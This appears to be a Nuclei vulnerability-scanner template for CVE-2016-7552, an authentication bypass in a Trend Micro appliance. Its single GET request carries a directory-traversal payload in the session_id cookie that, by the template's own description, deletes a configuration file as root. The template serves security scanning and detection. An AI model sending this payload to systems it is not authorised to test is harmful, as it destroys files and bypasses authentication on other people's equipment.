39 lines
1.3 KiB
YAML
39 lines
1.3 KiB
YAML
id: CVE-2016-7552
|
|
|
|
info:
|
|
name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
|
|
reference:
|
|
- https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-7552
|
|
- https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6
|
|
- http://web.archive.org/web/20210516181625/https://www.securityfocus.com/bid/97599
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-7552
|
|
cwe-id: CWE-22
|
|
tags: msf,cve,cve2016,lfi,auth,bypass
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/logoff.cgi"
|
|
headers:
|
|
Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "Memory map"
|
|
part: body
|
|
|
|
# Enhanced by mp on 2022/05/10
|